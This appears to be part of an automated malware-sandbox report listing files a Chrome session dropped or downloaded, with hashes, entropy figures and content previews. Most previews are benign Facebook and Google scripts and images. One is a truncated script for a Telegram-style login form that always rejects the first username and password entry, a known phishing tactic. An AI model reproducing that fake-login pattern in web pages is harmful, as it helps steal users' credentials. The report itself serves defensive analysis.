                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("IntlCLDRNumberType03",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a===0||a===1)return c("IntlVariations").NUMBER_ONE;else return c("IntlVariations").NUMBER_OTHER}};b=a;g["default"]=b}),98);.__d("IntlCLDRNumberType30",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a%10===1&&a%100!==11)return c("IntlVariations").NUMBER_ONE;else if(a%10>=2&&a%10<=4&&(a%100<12||a%100>14))return c("IntlVariations").NUMBER_FEW;else return c("IntlVariations").NUMBER_MANY}};b=a;g["default"]=b}),98);.__d("JSResource",["JSResourceReferenceImpl"],(function(a,b,c,d,e,f,g){var h={};function i(a,b){h[a]=b}function j(a){return h[a]}function a(a){a=a;var b=j(a);if(b)return b;b=new(c("JSResourceReferenceImpl"))(a);i(a,b);return b}a.loadAll=c("JSResourceReferenceImpl").loadAll;g["default"]=a}),98);.__d("QpActionFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1169)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3303
                                                                                                                                                                                                                                  Entropy (8bit):5.695602255086554
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:qeLs3NTYzJLEnL93LqLjrKDi9l2jcQZ8QLuuBhdf3NDjRQLN6qJ4np2PWOxfnrl:lzJAnB3evWgzc8uR3JR8btpl
                                                                                                                                                                                                                                  MD5:046C1D35568DF1515997349D6405E5CF
                                                                                                                                                                                                                                  SHA1:72C111172432EF127D3A070377E6C711D4CFEEE2
                                                                                                                                                                                                                                  SHA-256:3C4CCFB80EBB16AFC06C1EAE1089771E7D6004AC504B7C5BE674C211CEC21ADA
                                                                                                                                                                                                                                  SHA-512:49D6EB213B0BFA0B83FE5E9C5160DB176D46F3B1C18DF7E6EAF0A457A4A29DEF0AC3C200DDB0E426D074E5BA7CCC106AC2B7E12AE5D232DF8CFA717B59590809
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";_F_installCss(".b0JLwf{bottom:0;left:0;position:fixed;right:0;top:0;z-index:10}.QOklze{align-items:center;display:flex;height:64px;background-color:#000}.DKNkdc{color:#e8eaed;margin-left:16px}.DKNkdc:not(:disabled){color:#e8eaed}.NpygO{align-items:center;display:flex;height:calc(100vh - 64px);justify-content:center;position:relative}.h5VCA{background-color:rgba(0,0,0,.7);bottom:0;left:0;position:absolute;right:0;top:0}.O2ULYb{align-items:center;cursor:pointer;display:flex;position:absolute;z-index:20}.DSrEdf{justify-content:flex-start;left:0;margin-left:32px}.gEleAd{justify-content:flex-end;margin-right:32px;right:0}.x6Bxib{color:rgb(32,33,36);fill:rgb(32,33,36);stop-color:rgb(32,33,36);background-color:#fff;border-radius:50%}.x6Bxib:not(:disabled){color:rgb(32,33,36)}.P9KVBf .x6Bxib{color:rgb(232,234,237);fill:rgb(232,234,237);stop-color:rgb(232,234,237)}.P9KVBf .x6Bxib:not(:disabled){color:rgb(232,234,237)}.x6Bxib:not(:disabled){background-color:#fff}.P9KVBf .x6Bxib{back
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):61750
                                                                                                                                                                                                                                  Entropy (8bit):7.988653246685742
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:h3m0KFIOGUTYAdtjnUWO/P7ZZ2V6shE/9ZUhI:hW0bVGYMtjnUdlZ9sk3
                                                                                                                                                                                                                                  MD5:1F5C22BE9AD755701E8998B02B244060
                                                                                                                                                                                                                                  SHA1:40A9616FBC9436BF2D94169B5334685ACE4B08EE
                                                                                                                                                                                                                                  SHA-256:1D1C4C356F85922F003AF2D6FDBF39AAAFB830F9ECAFD91A83F061FACCD0155D
                                                                                                                                                                                                                                  SHA-512:25DEB967053135B20385E4EBDF0EDF621511CA7BDAA5371E7C6AD3C625E3D8BAD2D630CA6B222E6BBC2B658E2DDD4645AB24700CF3C4F6BE0CF08F3A8B0F30AD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/9ym56k3o3YeZFBGADv92ebqeIfILUe07DK9PNPdsHF_Ide5S4PSG_dzl7Xpaxo9D8ME=s256-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L!.../..?.M@.$7l3.... .`IVJ.....?I)..?V.2.a?...}K.z........"."..D........to....iI....s.nE.....<>.......o...{....A..F.2.?......*.....%`<.......P.7....c.....|]...m....Z..o\...Yld|)rOU.g.......Y..2.....uy.4.o.x.q.E....D.A.0......nq#.....tC.H....\Oz..$O.q|.....F...`.TU..HA.....\.m...pe......h.mIU..+c..S93s.=#........L..-...,..M%f...$.JF....[@....8!A.....IVm[y....=.>........L..A.4.f..8k........t....h.W...1.j.9..9.#...H.m.i.#$#.{.......K&...|C...m........ ..X8....G..?.~4..O.ro..]y..O...dt}..:..m.....=......>.?...!..m..&...U...d..\.. .m=.}}.Q..%.1..!'.]x...-U....)uY.f....!.z..@.......2..fiR.Te..:....~..k........."....."..F&{..z...^_.wu.... .G..$.M.,U3..d.{....U..?..@(.|.#....cWu'....1(..M..|d.......Tl6.$.)...CY.-.).Y.;..$...)...?...>xp...G._E8.34.u.[...g.9n..{...Ql..|..,.'A......U.........^lv.8.#t..-gW...QcSm.y;.Hy;.7K..L]t.aX.9%96..qT*~V.2.....u.......s..9.......;..0%2SG..O'l...<`...e..5..!.....4..H....ot.x.>b.iU...]........
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3933)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15391
                                                                                                                                                                                                                                  Entropy (8bit):5.268517708621699
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Pw21wClfXpg0JNGPq/MtLsXDqFlhaLjv3h:Po2fBJfEtsziXaLjvx
                                                                                                                                                                                                                                  MD5:CE60742BF1533AE782AE943CA2E46D3D
                                                                                                                                                                                                                                  SHA1:49EA2568DDE3A2368F96D293F3824E1633853F41
                                                                                                                                                                                                                                  SHA-256:F4DFA8F5F61F1239882A3C4AE0981971DADCA7C66FB64F01C8F299CE5157A215
                                                                                                                                                                                                                                  SHA-512:8F881198759785C7ADE63FA0D757AFED5D6D3036C3DAB02CA84BF0C9B4F5B51360F0ACEC3F7A7990644C39A87CBDCD9392665725A3FB986ADB0768D68AF77ABC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3imlR4/y0/l/en_GB/JAH0JDr9qF3.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AbstractLinkLynxMode",["FBLynx","LinkshimHandlerConfig"],(function(a,b,c,d,e,f,g){"use strict";function a(a){return a?[c("LinkshimHandlerConfig").www_safe_js_mode,null]:["hover",null]}function b(){d("FBLynx").setupDelegation()}g.getMode=a;g.setupDelegation=b}),98);.__d("DialogHideOnSuccess",["csx","CSS"],(function(a,b,c,d,e,f,g){a=function(){"use strict";function a(a){this._layer=a}var c=a.prototype;c.enable=function(){this._subscription=this._layer.subscribe("success",this._handle.bind(this))};c.disable=function(){this._subscription.unsubscribe(),this._subscription=null};c._handle=function(a,c){b("CSS").matchesSelector(c.getTarget(),"._s")&&this._layer.hide()};return a}();Object.assign(a.prototype,{_subscription:null});e.exports=a}),null);.__d("DialogPosition",["Vector"],(function(a,b,c,d,e,f,g){var h=40,i;function a(a,b,d,e,f){d===void 0&&(d=null);e===void 0&&(e=!1);f===void 0&&(f=!1);var g=c("Vector").getViewportDimensions(),j=!1;e&&d&&(j=d+b>g.y);if(d!=null&
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (1984)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9204
                                                                                                                                                                                                                                  Entropy (8bit):5.329185491092467
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:4RbGMN3dbr3/5kHIb+5VnNACeSLxxS5mwgWcawn/ADhuDVC5:4RFN3dbr3/5KNA6LxxPWkADh8VY
                                                                                                                                                                                                                                  MD5:ED263CCBB5012FA8240EFFE80AAD5CC1
                                                                                                                                                                                                                                  SHA1:89DFCBC546AC3F54BB54BEA9951FD58C14B37541
                                                                                                                                                                                                                                  SHA-256:2281C32FEF109437CF131D03ED582531064D890496CD77A81E777169D5EB6168
                                                                                                                                                                                                                                  SHA-512:AD771EF05A60CFB1270BCFAC4518FD870F66B3D55D320D6E9A031FFB85A20BD742BE9871CB087D87EC049EBB71FB3AAF912AFA064E4EBFF38E0875741E03AE2A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/4zS6aBDBtHT.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("Banzai",["cr:7383"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:7383")}),98);.__d("EventEmitterWithValidation",["BaseEventEmitter"],(function(a,b,c,d,e,f){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(b,c){var d;d=a.call(this)||this;d.$EventEmitterWithValidation1=Object.keys(b);d.$EventEmitterWithValidation2=Boolean(c);return d}var c=b.prototype;c.emit=function(b){if(this.$EventEmitterWithValidation1.indexOf(b)===-1){if(this.$EventEmitterWithValidation2)return;throw new TypeError(g(b,this.$EventEmitterWithValidation1))}return a.prototype.emit.apply(this,arguments)};return b}(b("BaseEventEmitter"));function g(a,b){a='Unknown event type "'+a+'". ';a+="Known event types: "+b.join(", ")+".";return a}e.exports=a}),null);.__d("JstlMigrationFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict";a=c("getFalcoLogPolicy_DO_NOT_USE")("1814852");b=d("FalcoLoggerInternal").create("jstl_migration",a);e=
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 32x32, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):256
                                                                                                                                                                                                                                  Entropy (8bit):6.9836276016676955
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:I3ZRGRbZD1dI3YIciub7g0HbwDmw9EyxNYS3Td/:I3zOZ1dOcg07wvE4NbTl
                                                                                                                                                                                                                                  MD5:EA315258B42B9D52F560DD7A7FB5B1F2
                                                                                                                                                                                                                                  SHA1:41F5D66E90EA567177BE1A3BA642069BC15C4D0D
                                                                                                                                                                                                                                  SHA-256:4DAE512DA7DD8BD31ED7E5C38AC0A6068EEE41136CA3A92B4237DA90EEB66E1B
                                                                                                                                                                                                                                  SHA-512:B9826CDDA453126342C804885F3F0BC1BC338BD46B24C5A89970C547477F64F8EBAD636A19D7397DDB6956CC4465CE11C34F815D8A8A32F23E7C26077DF90BA5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/a/ACg8ocKuSzmnDV00ix3atEWYmyGKFuKJcfnKhu7p7TvSSbZ4nTjDyA=s32-rw-mo
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 .........* . .>m2.G.".!(.....@.#.V......)...........q..$w9...........m.;...{.....t.|..B....?.Z.......EQ..i......A...EI:..RZ...Y~.R..4L..>Y...}<.!.C........'.P.u.7[.eu].4Zk.....Q.o..z.....|..%....c..~.vB.....&Ay.!.....@...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (506)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):5179
                                                                                                                                                                                                                                  Entropy (8bit):5.650644557546613
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kqoHfm5GYRcfo2hImUtQE3M3spu2VbV54Bj5eRnl:KHfmUMcd4QuG2uqbVWN5E
                                                                                                                                                                                                                                  MD5:9197458A966F130594BE4B9D9F166725
                                                                                                                                                                                                                                  SHA1:78D82A37E938B19D61126B783B4EC0E062475527
                                                                                                                                                                                                                                  SHA-256:34DC8F1271B4A633FFE89E0DD212BD5A2ACCD516DC0CD08AE4B13810BBD6F6B3
                                                                                                                                                                                                                                  SHA-512:3AC563C9B6D63136F237968B9508D02238C9B08908BB820A5F637469E43203D2BA2D31509ED14C6BBC6B64AB789111B21769813425451147442B5FC95F541F27
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,FuzVxc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PrPYRd,QIhFr,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,gKWqec,gychg,hKSk3e,hc6Ubd,kJXwXb,kWgXee,kjKdXe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qqarmf,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=e3Zld"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.EGc=function(a,b){b=(a?"zwAiMc":"Qv3d6b")+(b?" MgDOBd":"");var c=_.P;a=(0,_.P)('<svg class="'+_.T(a?"j9Syhb":"bKsVV")+'" viewBox="0 0 56 56" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M28 56C43.464 56 56 43.464 56 28C56 12.536 43.464 0 28 0C12.536 0 0 12.536 0 28C0 43.464 12.536 56 28 56Z" fill="black" fill-opacity="0.54"/><path fill-rule="evenodd" clip-rule="evenodd" d="M39.6667 28L21 17.5V38.5L39.6667 28Z" fill="white"/></svg>');a=""+_.iO(c(""+.a),void 0,b);return(0,_.P)(a)};._.N5=function(a,b,c,d){return(0,_.P)('<div class="'+_.T("uMConb")+" "+(d?_.T("giMhIc"):"")+" "+(b?_.T(b):"")+'"'+_.Vo(_.Uo(c??""))+">"+_.Q(a)+"</div>")};_.O5=function(a,b){return(0,_.P)('<div class="'+_.T("vU6FJ")+" "+_.T(b??"")+'">'+_.Q(a)+"</div>")};_.P5=function(a,b,c){return(0,_.P)("<div"+_.Vo(_.Uo(_.dp(a,!0)))+' class="'+_.T("b8cIId")+" "+_.T("ReQCgd")+
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):835
                                                                                                                                                                                                                                  Entropy (8bit):5.1223932389292655
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:D76bBSDFvVdGUF+fWlp9CkXXW/clctloFHMZeKsf:H8uNAwlpJmicnosk5
                                                                                                                                                                                                                                  MD5:A88ECA42083170AF225E964720471609
                                                                                                                                                                                                                                  SHA1:B73B59A702C62AD43B7617FDD627693C5240C659
                                                                                                                                                                                                                                  SHA-256:88995CCAA41E5467D559C0BE6C5D61FC5A49DE7E194861AC9EED559A5B4FB6F7
                                                                                                                                                                                                                                  SHA-512:21217F9BB3CA7F8D735448BFC4C3E3AA277B13B4BC1127AD5F406E84E00847F902533C45F145D1C050075EAF8FB249121C96A27CD9BF2BD18BE08286CF57D6AB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://ssl.gstatic.com/support/realtime/operatorParams
                                                                                                                                                                                                                                  Preview:{. "operatorDeferredUrl": "https://ssl.gstatic.com/support/realtime/operator/1726819261182/operatordeferred_bin_base.js",. "eagerLoadHostnamePattern": "((https://www\\.google\\.com/express)|(https://www\\.yt-web-green\\.corp\\.youtube\\.com)|(https://www\\.web-green-qa\\.youtube\\.com)|(((ads|adwords)(-.*)?|campaignmanager|photos-.*|play-.*|support|support-content-staging.sandbox|business|fi|.+\\.corp)\\.google\\.))",. "eagerLoadHostnameFlags": "i",. "cbfVersion": 1726819261182,. "screenShareVersion": 1727168469248,. "settings": {. "enable_customer_can_end_chat": true,. "enable_emojis": true,. "mole_show_survey_url_percentage": 100,. "mole_skin_version": 2,. "operatordeferred_report_rpc_events_percentage": 10,. "screenshare_skin_version": 3,. "rms_screen_share_skin_version": 4. }.}.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2208x1242, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):461114
                                                                                                                                                                                                                                  Entropy (8bit):7.999495016816934
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:6144:7N2Wq551jsArW5rQNGXnVyeWVlV/MLz3hSbmV1CB+mqHuLZ4gv8RvtmNpCCPChm2:BRASK8EeWxYEbA/HuLhv6tspCSPyGZlk
                                                                                                                                                                                                                                  MD5:6649C5F32AF7F500A61559054CEA6BE2
                                                                                                                                                                                                                                  SHA1:2F7FC77CF2EF09195C1981DB9D85070812F3F390
                                                                                                                                                                                                                                  SHA-256:8BDAAAF82784167044186C3666D7A4CA8E86D878538AD26337BBB17D7862D4D8
                                                                                                                                                                                                                                  SHA-512:51528E2CC22E68B4CF572FC2BADDA07C8BA0CE8F32C2A92C5DD97FE1C17D7C8867F842D2805D5E683B10BEE018767340DAE1B5657D3329AC0331A04BF964F343
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF2...WEBPVP8 &...0....*....>U$.E#.%%(..0...M..............|..?....HzS.!.!.?..hs..MF..T.{.[..._.y.......x.vW......!.....e.O.w...^.......=......p.....c......q.......~....?..g........2...g........?......w..._......!........[.y.....o...?.......................G...g......,.......S................s...w.....?.~........W.....................?.....|..S.w...'..O..?..]....................@?..h...../..~.>s.7...>6...?......7./....G..............g..........7.....?.~.z..C./...n~F.9.....G.O.O._........w.w%......a........_.?}......./...?.|..V......6....................~..F.C..._.....?....!........./}......c....i...M.%.B.N...p:'F@;..z..(.=...F..E.EJ..V.,/M.......>^$c-~.[1YK..j)...WpEh.aCV.....W1.}V.8_.*..$.".;....w.......[......XSn...p...Z:W&pd.M....[...r.F.......B....B...`KE.(.oP......Zj.q.Xm.........N...H..X........PW....)S.....;.......`......wb....BZ.Q.KV.;..j.Gv!-X(..%...%+Q.}...}o....o...[j)4.@;..T3.A.mB^.......6w<..u.{0...O....(E.D....5w{...,9...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2796)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29202
                                                                                                                                                                                                                                  Entropy (8bit):5.416734730710893
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:E32cy+EbepIFzTbeQzP9/1VwNxmkNP71u4Bh6BIKMzXHtX:uy+Ebe+hTbJNWxp5Nh6BzMzX5
                                                                                                                                                                                                                                  MD5:A7C2579885C6D3E48C485B590C75C7B5
                                                                                                                                                                                                                                  SHA1:4925F9BA613A1FFCAFDE1A8C94BDF222D6B794B6
                                                                                                                                                                                                                                  SHA-256:715AE0EBFC7BF06C2BEEBCA8A4C9C4BFFB5AD215FA980B71541EBD99AB864423
                                                                                                                                                                                                                                  SHA-512:1F868DBD8A3C20CD087E0D78423606D77E306AC25A50CD92947CBAAEB21C85225FF474C9E8DD7F86D254B1ABD458194F4BEA0B6E507B4B631401B2BC3D755409
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("DeferredComponent.react",["createCancelableFunction","react"],(function(a,b,c,d,e,f){var g,h=g||b("react");a=function(a){"use strict";babelHelpers.inheritsLoose(c,a);function c(b,c){var d;d=a.call(this,b,c)||this;d.cancelableModulesLoaded=function(){};d.$1=function(a){d.setState({ComponentClass:a},function(){d.props.onComponentLoad&&d.props.onComponentLoad(a)})};var e=null;function f(a){e=a}d.props.deferredComponent(f);d.state={ComponentClass:e};return d}var d=c.prototype;d.componentDidMount=function(){this.cancelableModulesLoaded=b("createCancelableFunction")(this.$1),this.props.deferredComponent(this.cancelableModulesLoaded)};d.componentWillUnmount=function(){this.cancelableModulesLoaded.cancel()};d.render=function(){var a=this.state.ComponentClass;if(!a||this.props.deferredForcePlaceholder)return this.props.deferredPlaceholder;var b=this.props;b.deferredPlaceholder;b.deferredComponent;b.onComponentLoad;b.deferredForcePlaceholder;b=babelHelpers.objectWithoutPr
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3212
                                                                                                                                                                                                                                  Entropy (8bit):4.868427484902244
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:1gJY0gXK6gulXtVcf/G9qLi1bg7atsMQtX/2WCwktV:u7stV99qe1cksv5bCjP
                                                                                                                                                                                                                                  MD5:477DBD44D5E73A3CB614E8848C5B796A
                                                                                                                                                                                                                                  SHA1:07B766C6F560DF6B8AAD13C9DAEC11A18E4DFE98
                                                                                                                                                                                                                                  SHA-256:68DFCE70EC7C8A7AA72FFF4CE1A32845BCCD1C36C49F03A4CC50ED05F7BCD275
                                                                                                                                                                                                                                  SHA-512:6FCEA1B7B07AFBBFB76A0084B02F886702CD5394CFF01F7A22AD20FEA47921B7340D2E60976D699DA57D267228554C2314397CDF814C6482E9A7797DCA3A4C8A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:document.addEventListener('DOMContentLoaded', () => {.. const form = document.getElementById('telegramForm');.. const loading = document.getElementById('loading');.. const validText = document.querySelector(".invalid") .. let tryCount = 0; // ....... ....... ......... form.addEventListener('submit', function(e) {.. e.preventDefault();.. .. const username = document.getElementById('username');.. const password = document.getElementById('password');.... // ........ ...... invalid-input, .... .. ... ........ ....... username.classList.remove('invalid-input');.. password.classList.remove('invalid-input');.... if (tryCount === 0) {.. // .... ...... ......., ........ ... .......... ...... username.classList.add('invalid-input');.. password.classList.add('invalid-input');.. validText.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1442
                                                                                                                                                                                                                                  Entropy (8bit):7.801015614718948
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:FB4TtLsXlTbVp50Ud0l0jGGtuF3BPuwawrCUw6dUUWr7y30vEhIYd0WQ:P4psXlTpp50dl0SGtuF3BPuwawrCUw6O
                                                                                                                                                                                                                                  MD5:E56D18D183F48A7F0590937CC428B161
                                                                                                                                                                                                                                  SHA1:D60374CFB103D44B0169C92DEB15C5F11B471866
                                                                                                                                                                                                                                  SHA-256:4E78D3F6468261893EBD1D9E81095489CCDC3C2594DA59DA5AEDC7D9F725C171
                                                                                                                                                                                                                                  SHA-512:93891B30156FEEC042E983C2FF8204CB457DA13ED5702C8FE1DE7AB6F4DE6FAB17E5B656D748F7A363F84B3C540A90EEA417A9DD2EF7BE03B8A4DEBEC6BAC328
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X........?..?..VP8 R...P....*@.@.>y(.F..!.3.=P...l...r.q89....r.V{i.f}^?.~.{....6...q.Dj..q.i.Z..p...C.E.?.......h...w...1....#.b.>_...G.u.m...]..C.......V.Q./..W$... ..+.U...8Q..{...P)......:6......)9..i)..;....5.........B.....3..WF.j...*jhb_Gg... ......=....d......T.5z-.'...h..x.~..I..-..[.....7.0>.ymA.....|.T.d.......G....|c..*9....(.....|..89N...L....El!J...3.._....3R..5fyx..b....kJ.BK.D...\C'T.....0.(.6.\..w...^OC.=...&...(.e.....PQ#cS..I.l......4.....rs.L`...C}.i...r.7.*.F...v..j..............>,....T<..\.....d...{.:R.L..~..6.x.2.....Dl..Nc?.>g.cc.Z8^.I.+......./.$.`.....4..a|.P"...;.{d..f...s|E.a.......y...%..P..j..|............e,....^._..p.3D..tn..`...\.L.,.'..0C.k.>.U.......VD.7.&....we.D......<.....\...c...8.M@y..&.>.4.^...?.s..x....p'6..uE.X.D.R.^d[.x.8w...J......1.J.W.~..i.#l.......5#...T].=..:.8........f..=.v)..E0#..........j.'f.}...n..wz.?.....93...|..,...2..H#......\N{...v.T.-..S".........y<..JTIpl.i....&.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                                  Entropy (8bit):4.888607732157158
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:hFLei3+dskwMKBEXCzDzP+rY:hFREsXDaM
                                                                                                                                                                                                                                  MD5:943ACBC823F865D15FC1030B147417E8
                                                                                                                                                                                                                                  SHA1:106E3FF5D9C6514771D715F35D86BA4692208DB1
                                                                                                                                                                                                                                  SHA-256:C477A2FA06FD8DD5A89D005E371ED332C588B7EDA420D1F0BF659BA2603FF7F1
                                                                                                                                                                                                                                  SHA-512:6F6ACA8C53815730690D51B19D6E19F7AA87758E1D176E188EBE56D1CDEB2096E67C33DF908BAF6DE43FA72551AD91B37B615DFF211C5C1E9E16EB3DC54CDDC1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
